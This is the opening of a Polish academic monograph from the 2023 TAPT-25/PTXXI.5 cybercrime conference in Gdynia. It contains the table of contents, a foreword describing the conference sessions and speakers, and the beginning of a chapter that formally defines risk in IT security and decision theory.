Content uploaded by Jerzy Kosiński
Author content
All content in this area was uploaded by Jerzy Kosiński on Jul 18, 2024
Content may be subject to copyright.
Content uploaded by Jerzy Kosiński
Author content
All content in this area was uploaded by Jerzy Kosiński on May 24, 2024
Content may be subject to copyright.
Content uploaded by Jerzy Kosiński
Author content
All content in this area was uploaded by Jerzy Kosiński on May 24, 2024
Content may be subject to copyright.
Content uploaded by Jerzy Kosiński
Author content
All content in this area was uploaded by Jerzy Kosiński on May 24, 2024
Content may be subject to copyright.
Content uploaded by Jerzy Kosiński
Author content
All content in this area was uploaded by Jerzy Kosiński on May 24, 2024
Content may be subject to copyright.
Content uploaded by Jerzy Kosiński
Author content
All content in this area was uploaded by Jerzy Kosiński on May 24, 2024
Content may be subject to copyright.
Content uploaded by Jerzy Kosiński
Author content
All content in this area was uploaded by Jerzy Kosiński on May 24, 2024
Content may be subject to copyright.
Content uploaded by Jerzy Kosiński
Author content
All content in this area was uploaded by Jerzy Kosiński on May 24, 2024
Content may be subject to copyright.
Content uploaded by Jerzy Kosiński
Author content
All content in this area was uploaded by Jerzy Kosiński on May 24, 2024
Content may be subject to copyright.
Content uploaded by Jerzy Kosiński
Author content
All content in this area was uploaded by Jerzy Kosiński on May 24, 2024
Content may be subject to copyright.
1
MORSKIE CENTRUM
CYBERBEZPIECZENSTWA
&
2023
2
Redaktor naczelny czasopisma: dr inż. Jakub Syta
Projekt okładki: mgr inż. Łukasz Grzyb
Recenzenci:
prof. dr hab. Krzysztof FICOŃ
dr hab. Bartłomiej PĄCZEK
Wszystkie artykuły dostępne są w Otwartym Dostępie (Open Access) na licencji CC BY-NC-ND
(Attribution – Non-Commercial – No Derivative Works). Poglądy wyrażone w artykułach nie zawsze są
zgodne z poglądami redaktora naczelnego, rady naukowej i recenzentów.
Wydawca: Morskie Centrum Cyberbezpieczeństwa
Akademia Marynarki Wojennej im. Bohaterów Westerplatte w Gdyni
ISSN (druk) 2720-4251
ISSN (online) 2720-426X
Współwydawca: Wydział Dowodzenia i Operacji Morskich Akademii Marynarki Wojennej
im. Bohaterów Westerplatte w Gdyni
3
SPIS TREŚCI
dr hab. inż. Jerzy KOSIŃSKI
dr inż. Jakub SYTA
dr Alicja ŻUKOWSKA
Słowo wstępne
5
dr inż. Krzysztof LIDERMAN
O ryzyku potocznie i formalnie
13
Wojciech PILSZAK
Proletariusze organów ścigania
25
dr Paweł WAWRZYNIAK
Review of research results on cybersecurity of the polish banking system
43
Tomasz JANCZEWSKI
Wybrane zagrożenia cyberbezpieczeństwa infrastruktury krytycznej
56
Krystian WOJCIECHOWSKI
Państwowy nadzór nad internetem w Rosji
63
dr Jacek CHARATYNOWICZ
Krajowe i międzynarodowe dokumenty strategiczne w zakresie
cyberbezpieczeństwa – wybrane problemy
98
Łukasz PIETRZYKOWSKI, Sasha SHEREMETOV, Igor LOSKUTOV
Odzyskiwanie danych z czarnej skrzynki
134
mgr inż. Kamil KOŁODZIEJCZYK
Metasploit jako alternatywne narzędzie wspierające informatykę śledczą
platform mobilnych
144
dr Zbigniew JAKUBOWSKI, Grzegorz MARCZAK
Hacking using (in)expensive hardware
154
dr Filip RADONIEWICZ
Pornografia w internecie - aspekty techniczne oraz karnomaterialne
170
dr Roman KASZUBOWSKI
Kryminologia jako nauka o sobie
186
4
Grzegorz MATYNIAK
Przy odrobienie dobrej woli platforma Steam nie będzie dobrym miejscem dla
oszustów - dwa kazusy CS GO
200
dr Maciej SZMIT
O problemach komunikacji między organem procesowym a biegłym. Wybrane
przypadki
237
dr Krzysztof Jan JAKUBSKI
Niebezpieczna sztuczna inteligencja
246
5
SŁOWO WSTĘPNE
Szanowni Państwo,
Kiedy w czerwcu 1998 roku grono ponad 60 osób z firm informatycznych,
policyjnych wydziałów informatyki i zwalczania przestępczości gospodarczej oraz
laboratoriów kryminalistycznych zebrało się, aby wymienić się doświadczeniami z
wykrywania śladów przestępstw popełnianych z wykorzystaniem systemów
teleinformatycznych, nikt nie przypuszczał, że z tego spotkania zrodzi się „tradycja” a
potem wręcz „społeczność”. Tradycja, gdyż wielu uczestników seminarium (a później
konferencji TAPT – Techniczne Aspekty Przestępczości Teleinformatycznej) w swoim
kalendarzu rezerwuje termin przed świętem Bożego Ciała na swój obowiązkowy udział.
Społeczność, gdyż wielokrotnie okazywało się, że nie tylko wiedza pozyskana na TAPT,
ale głównie znajomości i zaufanie do poznanych na TAPT osób były czynnikiem
determinującym sukces w prowadzonych sprawach.
Przez 20 lat kolejne edycje TAPT odbywały się w Wyższej Szkole Policji w
Szczytnie, pomimo częstych sugestii przełożonych, że nie ma sensu organizować
konferencji na ten sam temat (przestępczość teleinformatyczna) i organizowania
konferencji pokrewnych tematycznie: Przestępczość z wykorzystaniem elektronicznych
instrumentów płatniczych oraz Internetowe naruszenia własności intelektualnej.
W 2018 roku konferencja zmieniła nazwę na Przestępczość Teleinformatyczna
XXI (PTXXI) i lokalizację. Organizowania konferencji w formule tworzenia i
utrzymywania „społeczności zgromadzonej wokół TAPT” podjął się Wydział
Dowodzenia i Operacji Morskich Akademii Marynarki Wojennej w Gdyni. Tematyka
konferencji objęła w szerszym wymiarze cyberbezpieczeństwo i cyberprzestępczość w
wymiarze militarnym.
W dniach 5-7 czerwca 2023 roku w Bibliotece Głównej Akademii Marynarki
Wojennej w Gdyni odbyła się 25 edycja konferencji Techniczne Aspekty Przestępczości
Teleinformatycznej / 5 edycja konferencji Przestępczość Teleinformatyczna XXI (TAPT-
25/PTXXI.5).
Konferencja została zorganizowana przez Morskie Centrum
Cyberbezpieczeństwa AMW w Gdyni przy współpracy z Allegro Sp. z o.o. oraz
zondacrypto i współpracy z następującymi podmiotami: Związkiem Banków
Polskich/FinCert.pl, Fundacją Banku Polskiego, Fortinetem, Forcepointem, Fundacją
Przeciwdziałania Cyberprzestępczości, CDEX, VSDATA. Patronatów udzieliły:
Centralne Biuro Zwalczania Cyberprzestępczości, Biuro Bezpieczeństwa Narodowego
oraz Dowództwo Komponentu Wojsk Obrony Cyberprzestrzeni.
Celem konferencji było omówienie i analiza aktualnego stanu
cyberbezpieczeństwa oraz możliwości zwalczania cyberprzestępczości, przedstawienie
możliwych kierunków rozwoju zagrożeń i przeciwdziałań. Niemniej ważna była
wymiana doświadczeń pomiędzy uczestnikami Konferencji i utrzymanie współdziałania
„społeczności zintegrowanej przez TAPT”. Tematyka konferencji objęła:
- zwalczanie cyberprzestępczości, w tym w szczególności:
• zwalczanie cyberprzestępczości w e-commerce,
• zwalczanie cyberprzestępczości w sektorze bankowym,
6
• cyberbezpieczeństwo i cyberprzestępczość w wymiarze militarnym
• cyberbezpieczeństwo i cyberprzestępczość w obszarze kryptowalut
• naruszenia własności intelektualnej
• dowody cyfrowe, DFIR,
• projekty naukowe z zakresu wspomagania zwalczania
cyberprzestępczości.
Nad merytorycznym kształtem konferencji czuwał Komitet Naukowy w składzie:
• prof. dr hab. inż. Michał Choraś, Politechnika Bydgoska,
• prof. dr hab. inż. Krzysztof Ficoń, AMW,
• prof. dr hab. Bernard Wiśniewski, Akademia WSB,
• dr hab. Jacek Bil prof. WAT,
• dr hab. inż. Piotr Dela prof. Akademii Kaliskiej,
• dr hab. Agnieszka Gryszczyńska prof. UKSW,
• dr hab. inż. Jerzy Kosiński prof. AMW – przewodniczący,
• dr hab. inż. Grzegorz Krasnodębski prof. AMW,
• kmdr dr hab. Bartłomiej Pączek prof. AMW,
• dr hab. Halina Świeboda prof. ASzWoj,
• dr Jarosław Biegański,
• dr Bogdan Guziński,
• dr inż. Zbigniew Jakubowski,
• dr inż. Robert Janczewski,
• dr inż. Krzysztof Liderman,
• dr inż. Adam E. Patkowski,
• dr Alicja Żukowska,
• dr inż. Jakub Syta,
• Ireneusz Parafjańczuk,
• Jakub Pepłoński,
• Mariusz Tokarski,
• Piotr Balcerzak,
• Robert Kośla.
Otwarcia konferencji dokonał kontradmirał prof. dr hab. Tomasz Szubrycht,
Rektor-Komendant Akademii Marynarki Wojennej w Gdyni. Przemówienia powitalne
połączone z informacjami merytorycznymi wygłosili:
• Bogna Niklasiewicz, Dyrektor Działu Trust and Safety, Allegro.pl,
• nadinsp. Adam Cieślak, Komendant CBZC,
• płk Łukasz Jędrzejczak, Zastępca Dowódcy DK WOC.
Tuż po otwarciu przyszła pora na uczczenie jubileuszu konferencji. Wysiłek,
który włożył prof. Jerzy Kosiński w kształtowanie systemu cyberbezpieczeństwa
w Polsce został doceniony przez Ministra Obrony Narodowej, który przesłał na jego ręce
7
list gratulacyjny z okazji 25 edycji konferencji TAP-25/PTXXI.5. List gratulacyjny został
wręczony przez Dyrektora Departamentu Cyberbezpieczeństwa MON Pana Dominika
Rozdziałowskiego oraz Rektora-Komendant AMW kadm. prof. dr hab. Tomasza
Szubrychta.
Z okazji jubileuszu konferencji wręczeniem tabliczek pamiątkowych wyróżnieni
zostali: Andrzej Adamski, Piotr Balcerzak, Paweł Baraniecki, Jarosław Biegański, Paweł
Ciszek, Zbigniew Jakubowski, Łukasz Jędrzejczak, Maciej Kołodziej, Robert Kośla,
Grzegorz Krasnodębski, Artur Kubiak, Arkadiusz Lach, Krzysztof Liderman, Adam
Macoch, Mirosław Maj, Bogna Niklasiewicz, Ireneusz Parafjańczuk, Adam Patkowski,
Jakub Pepłoński, Wojciech Pilszak, Ryszard Piotrowski, Dominik Rozdziałowski, Witold
Sobolewski, Mariusz Tokarski, Krzysztof Wiciak.
8
W trakcie konferencji wygłoszono 44 wykłady (w tym 11 w j.angielskim) i
przeprowadzono 5 warsztatów (1 w j.ang.).
W pierwszej sesji plenarnej wykładowcami byli:
• Mariusz Tokarski, Allegro.pl – Przeszłość, teraźniejszość i przyszłość
zwalczania przestępczości w e-commerce,
• Jakub Pepłoński, Amazon – Współpraca działy bezpieczeństwa serwisu
Amazon z organami ścigania,
• Robert Kośla, Microsoft, Rada Konsultacyjna MCC – History and
challenges of cybercrime fighting.
W drugiej części dnia równolegle odbywały się sesje anglojęzyczna i
bankowa.W sesji anglojęzycznej wykłady wygłosili:
• Emmanuel Gravier, Attache ds. bezpieczeństwa wewnętrznego
Ambasada Francji – Fight against cybercrime: adapting tools to better
protect citizens,
• Andrew Sczygielski, Zastępca Szefa Biura FBI w Polsce, Specjalista
ds. Cyberprzestępczości – The Past, Present, and Future of Cybercrime
& Cryptocurrency,
• Robert Jones, UK Liaison Officer; Claire Gray, National Cyber Crime
Unit – Cooperation between Poland and UK in cybercases,
• Sean Cooper, Team Cymru – Why Threat Reconnaissance should be
part of your CyberSecurity Defense plan,
• Robert Kośla Lt.Col(R), Member of the Board, Cybersecurity
Foundation, Member of Consultation Board - Maritime Cybersecurity
Center – Cyber Revolution - advertising gimmick or real opportunities
(threats),
• Paul Rohmeyer, School of Business at Stevens Institute of Technology
– Cybersecurity Risk Analysis Using Scenario Threat Models.
W sesji bankowej prowadzonej przez FinCert.pl wystąpienia zaprezentowali:
• Piotr Balcerzak/Jarosław Biegański, BCC ZBP, FinCERT.pl – BCC
ZBP jako pojedynczy punkt kontaktowy adresujący wymagania DORA
w kontekście wymiany informacji,
• Agnieszka Gryszczyńska, Uniwersytet Kardynała Stefana
Wyszyńskiego, Prokuratura Krajowa – Koordynacja spraw z zakresu
cyberprzestępczości - aspekty prawne i praktyczne,
• Arkadiusz Lach, Uniwersytet Mikołaja Kopernika – Obowiązek
udostępnienia informacji umożliwiających dostęp do systemu
informatycznego lub danych,
• Jacek Charatynowicz, Centralne Biuro Śledcze Policji – Wpływ
rozwoju rynku kryptoaktywów na sektor bankowy,
9
• Jarosław Biegański, BCC ZBP – Dezinformacja w usługach
finansowych,
• Robert Jabłoński, Komenda Stołeczna Policji – reCyclix – piramida
finansowa - analiza przypadku.
Równolegle odbywały się warsztaty z wykorzystania Cyberpoligonu
prowadzone przez firmę CeDex.
Uroczysty wieczór uświęcił koncert zespołu EKT Gdynia.
W drugim dniu również prowadzone były dwie sesje równoległe. W pierwszej z
nich wygłoszono następujące wystąpienia:
• Aleksander Raczyński, Forcepoint – Catch me if you can - tracing
malicious insiders and preventing security breaches in the cyberwar
time,
• Jindrich Karasek, Trend Micro – Cognitive warfare and APT threats,
• Karl Zettl, Iknaio Cryptoasset Analytics GmbH – Collaborate way the
fight cybercrime,
• Rob Jones, IFPI – The pre-release music piracy ecosystem,
• Łukasz Pastuszka, Prokuratura Krajowa – Phishing i eksfiltracja
danych – praktyka prokuratorska,
• Tomasz Janczewski, Akademia Marynarki Wojennej – 356 cyberwojny,
czyli jakie ataki przeżył mój serwer w ostatnim roku,
• Robert Dąbrowski, Fortinet – Jak rozpoznać zagrożenia i przygotować
skuteczną odpowiedź,
• Grzegorz Piotrowski, Akademia Marynarki Wojennej – Analiza
przepływów w wykrywaniu grup (przestępczych),
• Bartosz Jerzman, Standard Chartered – Śledzenie grup APT – analiza
techniczna w Cyber Threat Intelligence,
• Witold Sobolewski, VS DATA – Cyberratownicy w akcji – zgaszone
pożary cyber w pierwszej połowie 2023 roku,
• Jacek Hojan, VS DATA – Obsługa i zgłaszanie incydentów, a ODO –
wymagania, błędy, braki,
• Radosław Machała, Flowberg IT – Odtwarzanie infrastruktury po
incydencie ransomware,
• Arkadiusz Czak, Krajowa Administracja Skarbowa – Analiza
materiałów wideo za pomocą narzędzi Open Source: Forevid,
MotionDetect.
Druga sesja, zdominowana w pierwszej części przez tematykę kryptowalut, a w
drugiej przez dowody cyfrowe i OSINT, zawierała wykłady:
• Przemysław Kral, zondacrypto – MICA wyzwania i rzeczywistość,
• Artur Kubiak, Marcin Borówka, zondacrypto – Studium przypadku,
10
• Krzysztof Świątek, Prokuratura Okręgowa w Jeleniej Górze –
Prokurator w świecie krypto,
• Sławomir Sola, Prokuratura Okręgowa w Gliwicach – Doświadczenia
z kryptowalutami w toku prowadzonych śledztw,
• Nina Waldman, Christoph Puhl, ChainAnalysis – Introduction to
blockchain forensics,
• Przemysław Rejczak, BWIIK KGP; Piotr Kramek, DataWalk;
Radosław Kodeniec, Enigma – System Wymiany i Analizy Informacji
Big Data. Rozwiązanie offline łączące dane bitcoin z tradycyjnymi
śledztwami finansowymi,
• Grzegorz Marczak, Zbigniew Jakubowski, Compendium – Hacking
using (in)expensive hardware,
• Łukasz Pietrzykowski, Rusolut – Odzyskiwanie danych z czarnych
skrzynek pozyskanych z samolotów i helikopterów,
• Mateusz Pstruś, Bernadeta Zalewska, STM Cyber – STM Cyber
Academy - nowy wymiar edukacji bezpieczeństwa ofensywnego,
• Krzysztof Bińkowski, NetKomputer, AMW – Czy SN urządzenia USB
prawdę Ci powie?
• Krystian Wojciechowski – Runet - przykłady narzędzi kontroli sieci,
• Betina Tynka, Mediarecovery – ADINT – nowa metodologia
profilowania przestępców w ramach OSINT,
• Marcin Waszczuk, Microsoft – Różne źródła - jeden cel. Jak
wykorzystać dane, aby sprawnie znaleźć odpowiedzi na pytania.
Akcelerator technologiczny MINTED.
Równolegle odbywały się warsztaty tematyczne:
• Cyberpoligon, prowadzący: CeDex,
• Współpraca z podmiotami świadczącymi usługi data centrowe oraz
telekomunikacyjne w zakresie zabezpieczania i pozyskiwania
dowodów z uwzględnieniem specyfiki eksfiltracji danych
(nieuprawnionego dostępu i kradzieży), prowadzący: Michał Paluszek,
P4 (dla funkcjonariuszy i prokuratorów),
• Nie tylko zagrożenia zewnętrzne - jak insider może zagrozić
cyberbezpieczeństwu organizacji: pokaz technik ataku na żywo – Red
Teaming, prowadzący: Mateusz Pstruś, Bernadeta Zalewska, STM
Cyber.
W ostatnim dniu konferencji wygłaszano wykłady również w dwóch sesjach
równoległych. W pierwszej wykłady prezentowali:
• Maciej Kołodziej, e-Detektywi sp. z o.o. – Nie da się, brak możliwości
technicznych oraz inne przyczyny marnotrawienia czasu i środków w
postępowaniach,
11
• Małgorzata Żmigrodzka, Lotnicza Akademia Wojskowa – Cyberataki
w przestworzach,
• Paweł Dobrzański, T-Mobile Polska S.A. – Aspekty telekomunikacyjne
w czasie konfliktu zbrojnego,
• Marta Steciak, Prokuratura Krajowa w Rzeszowie; Kamil Boroszko,
Wydział w Rzeszowie CBZC – Child Sexual Abuse Material –
typowanie, zwalczanie, współpraca. Case study,
• Jakub Syta, MCC AMW Gdynia – Przyszłe konflikty zbrojne z
perspektywy działań mających miejsce w cyberprzestrzeni.
W drugiej, zdominowanej przez naruszenia własności intelektualnej w
Internecie i inne treści nielegalne, wystąpienia przedstawili:
• Teresa Wierzbowska, Stowarzyszenie Sygnał – Piractwo TV w 2023. O
skali kradzieży treści wideo w internecie, stratach dla rynku oraz
metodach zwalczania,
• Wojciech Ryżowski, Ministerstwo Finansów – Dobre praktyki
wymiany informacji,
• Filip Radoniewicz, Akademickie Centrum Polityki
Cyberbezpieczeństwa ASzWoj – Nielegalne treści w Internecie -
wybrane aspekty prawnokarne oraz techniczne,
• Sebastian Kondraszuk, CERT Polska – Trendy w obszarze
cyberbezpieczeństwa w roku 2022, na bazie doświadczeń CSIRT
NASK,
• Dariusz Podufalski, Prokuratura Okręgowa w Bydgoszczy –
Międzynarodówka oszustów, hosty, domeny, spoofing, szukać i
przeciwdziałać – postulaty de lege ferenda.
Konferencję zakończyła sesja dotycząca projektów naukowo-badawczych, w
której wygłoszono wykłady:
• Mariusz Zdrojek, Cezamat – Nowe materiały do zabezpieczenia
urządzeń elektronicznych i nośników danych przed promieniowaniem
elektromagnetycznym,
• Krzysztof Krassowski, Akademia Górniczo Hutnicza – Projekty
rozwojowe i inne działania Akademii Górniczo-Hutniczej w domenie
bezpieczeństwa,
• Marek Wierzbicki, Klaudia Kaczmarek, Polska Platforma
Bezpieczeństwa Wewnętrznego – Projekty Europejskie z obszaru
cyberbezpieczeństwa.
12
Wykłady udostępnione przez prelegentów można znaleźć pod adresem:
https://amwgdyniapl-
my.sharepoint.com/personal/j_kosinski_amw_gdynia_pl/_layouts/15/onedrive.aspx?id=
%2Fpersonal%2Fj%5Fkosinski%5Famw%5Fgdynia%5Fpl%2FDocuments%2FPTXXI
%2E5&ga=1
Część z wystąpień znalazła swoje odzwierciedlenie w publikowanych w
niniejszej monografii rozdziałach. Niemniej jednak zachęcamy do zapoznania się z
całością monografii. Autorzy rozdziałów dołożyli starań, aby przedstawiona tematyka
była zarówno na odpowiednim poziomie naukowym, jak i ciekawie przedstawiona.
Życząc czytelnikom przyjemnej lektury zachęcamy do kontaktu z redaktorami,
w sprawie kolejnych edycji konferencji i monografii.
Dr hab. inż. Jerzy Kosiński, prof. AMW
Dr inż. Jakub Syta
Dr Alicja Żukowska
13
O RYZYKU POTOCZNIE I FORMALNIE
RISK - COLLOQUIALLY AND FORMALLY
Dr inż. Krzysztof LIDERMAN
1
Instytut Teleinformatyki i Cyberbezpieczeństwa WAT
Streszczenie
W artykule przedstawiono rozważania na temat istoty ryzyka i jego znaczenia dla
podejmowania decyzji optymalnych. Przedstawiono także sformalizowaną definicję
ryzyka w odniesieniu do decyzji i związanych z nią oczekiwanych strat. Dla zilustrowania
praktycznego zastosowania pojęcia ryzyka zamieszczono przykład związany z realizacją
zagrożeń powodujących szkody w systemach teleinformatycznych i przetwarzanych w
nich zasobach informacyjnych, różnicując go z analizą skutków biznesowych.
Słowa kluczowe: ryzyko, oszacowanie ryzyka IT, analiza skutków biznesowych
Summary
The article presents a consideration of the nature of risk as well as its importance for
optimal decision-making. Formalized definition of risk was discussed in relation to the
decision and the associated expected losses. To illustrate the practical application of the
concept of risk, an example related to the realization of threats causing damage to
information and communication systems and the information resources processed in them
is included, differentiating it from the analysis of business consequences.
Keywords: risk, IT risk evaluation, Business Impact Analysis
WPROWADZENIE
Próby formalnego ujęcia ryzyka datują się na drugą połowę XVIII wieku
(w tym czasie powstały też zręby współczesnego rachunku prawdopodobieństwa) i mają
swoje korzenie w grach hazardowych. Oszacowania ryzyka (tj. określania jego wartości
w różnych sytuacjach) były podstawą do podejmowania decyzji typu „jak obstawiać,
żeby wygrać”. Ryzyko zatem służyło do podjęcie decyzji optymalnej (lub przynajmniej
racjonalnej) dla decydenta w odniesieniu do ewentualnych strat, które mogłyby powstać
w przypadku realizacji decyzji.
Z biegiem lat pojęcie ryzyka rozpowszechniło się z gier hazardowych
wszędzie tam, gdzie potrzebne było podjęcie decyzji na podstawie niepewnej bądź
niepełnej wiedzy zarówno o możliwych skutkach decyzji jak i warunków, jakie będą
istniały w momencie realizacji decyzji. Obecnie oszacowanie ryzyka jest standardem (i
często wymaganiem prawnych) w dziedzinach takich jak finanse, ubezpieczenia,
1
ORCID 0000-0002-0004-5095)
14
projektowanie (tzw. ryzyko projektowe), zarządzanie (decyzje w osiąganiu celów
biznesowych – patrz dalej) czy ochrona zasobów informacyjnych („bezpieczeństwo”).
Zagrożenia
2
dla systemów teleinformatycznych (IT) oraz zasobów informacyjnych w
nich przetwarzanych, można sklasyfikować następująco:
1. „Siły wyższe” − zdarzenie zewnętrzne, niemożliwe (lub prawie niemożliwe) do
przewidzenia, którego skutkom nie można zapobiec
3
.
2. Działania ludzi:
2.1. Celowe (nieuprawnione
4
i przestępcze):
• działania personelu, w tym podsłuchy różnego typu i kradzieże oraz zagubienia
nosicieli informacji (sprzętu i dokumentów);
• działania osób postronnych (klienci, „hakerzy”), w tym różnego typu podsłuchy
i kradzieże nosicieli informacji (dokumentów i sprzętu);
2.2. Błędne
5
.
Realizacja zagrożeń wpływa niekorzystnie na osiąganie celów
biznesowych. COBIT-owe [8] praktyki z zakresu governanace (EDM03.01: Ocena,
kierowanie, monitorowanie − Zapewnienie optymalizacji ryzyka − Zgodność IT z
biznesowymi celami strategicznymi) wskazują, że zarząd organizacji powinien określić
swój „apetyt na ryzyko”
6
i poziom tolerancji ryzyka
7
. Czynniki, które zwiększają poziom
ryzyka dla organizacji i jej systemów IT to wrażliwość i objętość przetwarzanych zbiorów
danych, krytyczność świadczonych usług, liczba użytkowników, połączenia z siecią
publiczną i korzystanie z usług innych podmiotów.
Ogólnie, krytyczność systemów IT jest zależna od wagi ciągłości
świadczenia wspieranych procesów biznesowych i usług. Krytyczność systemu może być
w praktyce oceniona przez oszacowanie strat finansowych które mogą wystąpić jako
rezultat jego przestoju. Do takiej oceny można wykorzystać analizę skutków
biznesowych. Podczas oceny krytyczności systemu jest ważne, aby zrozumieć i
uwzględnić wpływ jego przestoju (np. w wyniku awarii) na działanie aplikacji
pracujących w stowarzyszonych przepływach biznesowych.
POJĘCIE RYZYKA W SŁOWNIKACH I POTOCZNYM ROZUMIENIU
Tytułowy termin „ryzyko”, jest różnie definiowany. Według normy
PN-ISO/IEC-27005:2014 [10] ryzyko związane z bezpieczeństwem informacji to:
„… potencjalna sytuacja, w której określone zagrożenie wykorzysta podatność aktywów
lub grupy aktywów powodując w ten sposób szkodę dla organizacji.
2
Od zagrożenia należy odróżniać sposób jego realizacji.
3
Do takich zdarzeń należą tzw. katastrofy naturalne (trzęsienia ziemi, powodzie itp.), zjawiska przyrodnicze
takie jak emisja ujawniająca oraz zjawiska polityczne takie jak terroryzm. Do tej klasy zagrożeń można
także zaliczyć polski Sejm i Senat w zakresie ustanawiania przepisów prawa.
4
Działaniami nieuprawnionymi są nazywane takie działania celowe, niepożądane przez dysponenta systemu
bądź zasobów danych, które mogą doprowadzić do powstania szkód, ale na które nie ma paragrafów w
Kodeksie Karnym („nie wyczerpują ustawowych znamion przestępstwa”).
5
Przykład z 04.10.2021 – awaria Facebooka. Powodem awarii była błędna aktualizacja zewnętrznego
protokołu trasowania BGP. Specjaliści od sieci Facebooka wprowadzali pewne zmiany w konfiguracji
i przez pomyłkę doprowadzili do trwającej kilka godzin awarii.
6
Czyli poziom ryzyka, który zarząd tej organizacji jest skłonny zaakceptować, aby osiągnąć założone cele
biznesowe.
7
Czyli okresowe, akceptowalne odchylenia od przyjętej wartości „apetytu na ryzyko”.
15
UWAGA: Ryzyko jest mierzone jako kombinacja prawdopodobieństwa zdarzenia i jego
następstw”. W normie ISO 31000 [9] ryzyko określa się jako skutek powstały w wyniku
niepewności w odniesieniu do ustalonych przez organizację celów. W takim ujęciu jest to
ryzyko rozumiane neutralnie, zarówno jako szansa, jak i zagrożenie. Z kolei z Ustawy o
Krajowym Systemie Cyberbezpieczeństwa można się dowiedzieć, że ryzyko oznacza:
„ … kombinację prawdopodobieństwa wystąpienia zdarzenia niepożądanego i jego
konsekwencji”.
Ale w Dyrektywie NIS
8
można przeczytać, że:
„ … „ryzyko” oznacza każdą dającą się racjonalnie określić okoliczność lub zdarzenie,
które ma potencjalny niekorzystny wpływ na bezpieczeństwo sieci i systemów
informatycznych”.
W normie IEC 61508 [13], wiąże się pojęcie ryzyka z pojęciem hazardu:
„... ryzyko jest miarą stopnia zagrożenia, wyrażającą zarówno stopień szkodliwości
hazardu, jak i prawdopodobieństwo jego wystąpienia”.
Określenie „ryzyko” ma zatem wiele odcieni znaczeniowych. W każdym z
nich jednak jest związane z pojęciem „straty”, co jest zgodne również z intuicyjnym
rozumieniem tego terminu (tam, gdzie mamy do czynienia z zyskami mówi się raczej o
„szansie” a nie o ryzyku
9
). W praktyce stosowane jest też często pojęcie „ryzyka
operacyjnego“. Jest ono szczególnie rozpowszechnione w instytucjach typu finansowego,
gdzie za Bazylejskim Komitetem ds. Nadzoru Bankowego [12] przyjmuje się, że ryzyko
operacyjne
10
należy rozumieć jako ryzyko straty wynikającej z niedostosowania lub
zawodności wewnętrznych procesów, ludzi i systemów technicznych lub ze zdarzeń
zewnętrznych.
Zatem można przyjąć, że ryzyko, zagrożenie, strata itp. to powszechnie
używane słowa o utrwalonym, ale podlegającym ciągłej ewolucji, znaczeniu. Znaczenia
(interpretacje) pojęć i terminów różnych podane są także w słownikach, i to słowniki
przede wszystkim (wspólnie z normami i standardami) wyznaczają normę znaczeniową.
Według https://sjp.pwn.pl/sjp/ryzyko;2518509.html:
Ryzyko
1. «możliwość, że coś się nie uda; też: przedsięwzięcie, którego wynik jest niepewny»
2. «odważenie się na takie niebezpieczeństwo»
3. «prawdopodobieństwo powstania szkody obciążające osobę poszkodowaną
niezależnie od jej winy, jeśli umowa lub przepis prawny nie zobowiązały innej osoby do
wyrównania szkody»
Dla porównania, według
https://dictionary.cambridge.org/dictionary/english/risk:
Risk
1. The possibility of something bad happening.
2. Something bad that might happe.:
8
Dyrektywa Parlamentu Europejskiego i Rady w sprawie środków na rzecz wysokiego wspólnego poziomu
bezpieczeństwa sieci i systemów informatycznych na terytorium Unii przyjęta w lipcu 2016 roku.
9
Jest program TV „Szansa na sukces” a nie „Ryzyko sukcesu”, mówi się o „szansie wygrania w LOTTO” a
nie o ryzyku wygrania itp. Należy jednak odnotować, że w analizie ryzyka np. w zastosowaniach
finansowych, operuje się zarówno zyskami jak i stratami.
10
Wyłącza się z niego ryzyko reputacji i strategiczne.
16
Czyli ryzyko jest utożsamiane z możliwością zajścia niekorzystnego
zdarzenia, zwykle w sensie poniesienia (jakiejś) straty przez podmiot dotknięty tym
zdarzeniem. Warto także zwrócić uwagę na zwroty z użyciem terminu risk przytoczone
w tym słowniku.
1) at risk of
− in a dangerous situation: all houses within 100 metres of the seas are at risk of
flooding.
Wydaje się, że ten zwrot odpowiada polskiemu „podatność” (… są
podatne na zalanie).
2) at your own risk
− Drivers are reminded that they leave their cars here at their own risk.
Czyli jest to odpowiednik zwrotu „na własne ryzyko” – jak coś się
stanie, to Ty zapłacisz.
3) run/take a risk
− to do something that might be dangerous: don't take any risks - just call the police;
− at the risk of doing something;
− run the risk of doing something.
Wszystkie powyższe znaczenia można formalizować do poziomu
prawdopodobieństwa/możliwości. Zarządzanie ryzykiem można prowadzić wtedy
korzystając z teorii decyzji statystycznych dotyczącej oceny liczbowej decyzji.
POJĘCIE RYZYKA W UJĘCIU FORMALNYM
W tym rozdziale, za [3], jest przedstawione formalne ujęcia ryzyka
wykorzystywane w teorii statystycznych funkcji decyzyjnych. Niech:
1. A – zbiór decyzji a zdeterminowanych,
11
2. W – zbiór warunków (w jakich są podejmowane decyzje),
3. U – przestrzeń zdarzeń elementarnych,
4. E1 – zbiór zdarzeń elementarnych będący zbiorem liczb rzeczywistych
(zastosowano oznaczenie E1 zamiast tradycyjnego R żeby ten fakt podkreślić),
5. Ϭ(U) – zbiór zdarzeń, tutaj Ϭ(sigma)-ciało podzbiorów przestrzeni U (za
zdarzenie zϵϬ(U) przyjmuje się podzbiór przestrzeni U),
6. P:Ϭ(U)→[0,1] – miara prawdopodobieństwa P (jest to przeliczalnie addytywna
funkcja),
7. U, Ϭ(U), P – przestrzeń probabilistyczna,
8. xϵE1: {uϵU: fs(u)x}ϵϬ(U) – warunek mierzalności funkcji rzeczywistej fs,
9. FS:U→E1 – zmienna losowa, tj. funkcja przypisująca zdarzeniom
elementarnym liczby,
10. fs:A→E1 – funkcja rzeczywista o wartościach fs(a)ϵE1
11
Gdy mamy antagonistę który w sposób inteligentny odpowiada na nasze decyzje, to losujemy decyzję α ze
zbioru A* decyzji zrandomizowanych (losowych) – zwiększamy mu niepewność.
17
Funkcja fs jest wskaźnikiem jakości decyzji (tj. fs(a) określa liczbowo jakość decyzji aϵA).
Zakładając, że wartość fs(a) dla decydenta ma sens straty spowodowanej wyborem
decyzji aϵA (tak jest w „bezpieczeństwie”), funkcję rzeczywistą (o wartościach fs(a)
należących do zbioru liczb rzeczywistych, co oznaczamy E1) fs:A→E1 nazywa się
funkcją straty.
11. fs:W×A →E1 – funkcja rzeczywista o wartościach fs(w, a(w))ϵE1.
Ta funkcja przedstawia zagadnienie decyzyjne uwarunkowane. Funkcja
strat zależy nie tylko od podejmowanych przez decydenta decyzji, ale także od
określonych warunków. W przypadku szacowania ryzyka dla „bezpieczeństwa”
uwzględnia się możliwość realizacji zagrożenia oraz podatności umożliwiające taką
